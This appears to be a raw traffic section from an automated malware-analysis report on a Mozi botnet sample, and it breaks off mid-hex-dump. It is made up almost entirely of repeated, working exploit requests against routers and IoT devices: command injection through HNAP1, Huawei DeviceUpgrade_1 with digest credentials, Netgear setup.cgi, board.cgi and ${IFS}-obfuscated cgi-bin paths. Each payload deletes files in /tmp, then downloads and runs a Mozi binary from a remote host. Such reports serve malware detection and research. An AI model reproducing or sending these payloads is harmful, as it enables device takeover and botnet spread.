                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 205.190.110.250:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 81.72.56.112:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 144.176.109.6:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 118.197.10.107:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 5.174.228.198:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 171.88.32.116:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 137.202.127.253:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 144.147.141.226:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 